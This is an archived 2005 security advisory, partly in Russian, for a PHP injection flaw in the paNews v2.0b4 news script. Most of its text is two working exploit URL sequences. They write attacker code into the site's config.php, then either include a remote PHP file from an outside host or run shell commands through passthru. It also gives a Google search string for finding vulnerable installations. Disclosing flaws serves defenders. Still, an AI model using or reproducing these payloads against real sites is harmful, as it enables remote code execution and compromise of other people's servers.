paNews v2.0b4 - PHP Injection

2005-02-21T00:00:00
ID SECURITYVULNS:DOC:7876
Type securityvulns
Reporter Securityvulns
Modified 2005-02-21T00:00:00

Description

oooo oooo oooooooo8 ooooooooooo 8888o 88 888 88 888 88 88 888o88 888oooooo 888
88 8888 888 888
o88o 88 o88oooo888 o888o


* Network security team * nst.e-nex.com * ***** Title: paNews v2.0b4 Bug found by: тёмыч Date: 20.02.2005 *****

web: http://www.phparena.net/panews.php google: allintitle:paNews v2.0b4

PHP Injection Бага работает только если: 1. register_globals=On 2. на папку includes стоят права на запись

p.s. отрубите яваскрипты - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php

Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id